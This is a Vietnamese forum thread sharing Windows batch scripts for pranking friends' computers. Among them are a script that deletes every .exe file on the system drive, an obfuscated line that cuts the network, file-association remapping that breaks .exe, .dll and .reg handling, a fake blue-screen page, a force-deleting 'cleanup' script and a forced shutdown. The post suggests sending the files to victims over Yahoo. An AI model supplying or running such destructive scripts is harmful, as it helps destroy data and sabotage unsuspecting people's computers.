[Thủ thuật] Một số code bat dùng để troll máy tính bạn bè :))

 • Móm Đặc Biệt
  Hôm nay mình sẽ giới thiệu 1 số code bat khá hay dùng để chọc phá máy tính bạn bè Smile

  Bước 1:
  Tạo 1 file notepad bằng cách chuột phải vào Desktop >> New >> Text document

  Bước 2:
  Copy 1 số code ở dưới vào notepad và save lại dưới dạng abc.bat



  Swap Mouse button (đảo chuột trái thành phải và ngược lại)

  Code:
  @ echo off
  rem ---------------------------------
  rem Swap Mouse Buttons
  RUNDLL32 USER32.DLL,SwapMouseButton
  rem ---------------------------------

  Delete all .exe files in the computer (suy nghĩ kĩ khi sử dụng code này)

  Code:
  @ echo off
  rem ---------------------------------
  rem Delete All Exe
  DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
  echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
  rem ---------------------------------

  Disable internet (làm mất mạng tạm thời)

  Code:
  @ echo off
  rem ---------------------------------
  rem Disable Internet
  @Echo off & @@Break Off
  Ipconfig /release
  %jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?!
  P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%
  rem ---------------------------------

  Confuse File Extensions (đổi định dạng của file, ví dụ exe thành png...)

  Code:
  @ echo off
  rem ---------------------------------
  rem Confuse File Extensions Powerup
  assoc .dll=txtfile
  assoc .exe=pngfile
  assoc .vbs=Visual Style
  assoc .reg=xmlfile
  assoc .txt=regfile
  rem ---------------------------------
  rem Confuse File Extensions for text
  assoc .mp3=txtfile
  assoc .xml=txtfile
  assoc .png=txtfile
  rem ---------------------------------

  Create Fake Blue Screen Of Death - Màn hình xanh chết chóc giả

  Chắc ai cũng biết đến màn hình xanh huyền thoại nhỉ... nỗi đáng sợ của những người sử dụng máy tính
  Sau đây mình sẽ hướng dẫn tạo ra 1 cái màn hình xanh giả để chơi troll 1 ai đó

  - Sau khi run file này. Lập tức sẽ có màn hình xanh giả được tạo ra. Với những người không để ý kĩ thì sẽ lầm tưởng rằng bị màn hình xanh thật

  - Tắt đi bằng cách Alt + F4 là đc

  Code:
  @echo off
  echo ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.hta
  echo. >> bsod.hta
  echo ^<hta:application id="oBVC" >> bsod.hta
  echo applicationname="BSOD" >> bsod.hta
  echo version="1.0" >> bsod.hta
  echo maximizebutton="no" >> bsod.hta
  echo minimizebutton="no" >> bsod.hta
  echo sysmenu="no" >> bsod.hta
  echo Caption="no" >> bsod.hta
  echo windowstate="maximize"/^> >> bsod.hta
  echo. >> bsod.hta
  echo ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.hta
  echo ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.hta
  echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>Technical information:^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo ^<p^>Beginning dump of physical memory^</p^> >> bsod.hta
  echo ^<p^>Physical memory dump complete.^</p^> >> bsod.hta
  echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.hta
  echo. >> bsod.hta
  echo. >> bsod.hta
  echo ^</font^> >> bsod.hta
  echo ^</body^>^</html^> >> bsod.hta
  start "" /wait "bsod.hta"
  del /s /f /q "bsod.hta" > nul

  Xóa các tập tin không cần thiết cho máy tính (giúp windows hoạt động mượt hơn)

  Code:
  @echo off
  color 0C
  echo Tien trinh se xoa file khong can thiet ...
  del /f /s /q %systemdrive%\*.tmp
  del /f /s /q %systemdrive%\*._mp
  del /f /s /q %systemdrive%\*.log
  del /f /s /q %systemdrive%\*.gid
  del /f /s /q %systemdrive%\*.chk
  del /f /s /q %systemdrive%\*.old
  del /f /s /q %systemdrive%\recycled\*.*
  del /f /s /q %windir%\*.bak
  del /f /s /q %windir%\prefetch\*.*
  rd /s /q %windir%\temp & md %windir%\temp
  del /f /q %userprofile%\cookies\*.*
  del /f /q %userprofile%\recent\*.*
  del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
  del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
  del /f /s /q "%userprofile%\recent\*.*"
  echo Tat ca da ket thuc.!
  pause

  Cuối cùng code dùng để tắt và reset máy chỉ với 1 click

  Code:
  shutdown -s -t 60 -c "loi nhan" -f
  Có thể thay s bằng r dùng để reset máy
  -t 60 với 60 là thời gian tắt tính bằng giây, dùng để hẹn giờ tắt máy mà không cần can thiệp bởi bất cứ phần mềm nào. Các bạn có thể sửa lại tùy ý
  -c là lời nhắn dùng để tự kỉ hoặc troll winking

  Lời kết: File sau khi lưu lại dưới dạng .bat có thể gửi qua yahoo,...



  Được sửa bởi Titus ngày 01.09.16 21:23; sửa lần 1.

 • Giựt
  Quỳ


  --Chữ ký--
  Diễn đàn Kênh Game 360>> Smile
 • the_dav
 • Móm Đặc Biệt
  Troll mấy thằng bạn chắc nó khóc tiếng campuchia Smile


  --Chữ ký--
  Laughing Diễn đàn Rao vặt, anh em rãnh ghé thăm nhé Laughing


  Very Happy Địa chỉ: http://vnraovat.forumvi.com/ Very Happy
 • Sponsored content

Thông tin tác giả
Móm Đặc Biệt
S-MOD
Bài viết :
287
Points :
594
Like :
157
Punbb
An toàn
Status :
Đành vậy thế thôi
Xem lý lịch thành viên http://vnraovat.forumvi.com/
Thông tin tác giả
Giựt
MOD
Bài viết :
273
Points :
440
Like :
89
Punbb
Cẩn thận
Status :
Giựt đẹp trai
Xem lý lịch thành viên
Thông tin tác giả
the_dav
MEM LV3
Bài viết :
222
Points :
319
Like :
47
Punbb
Quản trị
Xem lý lịch thành viên
Thông tin tác giả
Móm Đặc Biệt
S-MOD
Bài viết :
287
Points :
594
Like :
157
Punbb
An toàn
Status :
Đành vậy thế thôi
Xem lý lịch thành viên http://vnraovat.forumvi.com/
Thông tin tác giả
Sponsored content
Bài viết liên quan
  Đang tải dữ liệu

Permissions in this forum:
Bạn không có quyền trả lời bài viết

<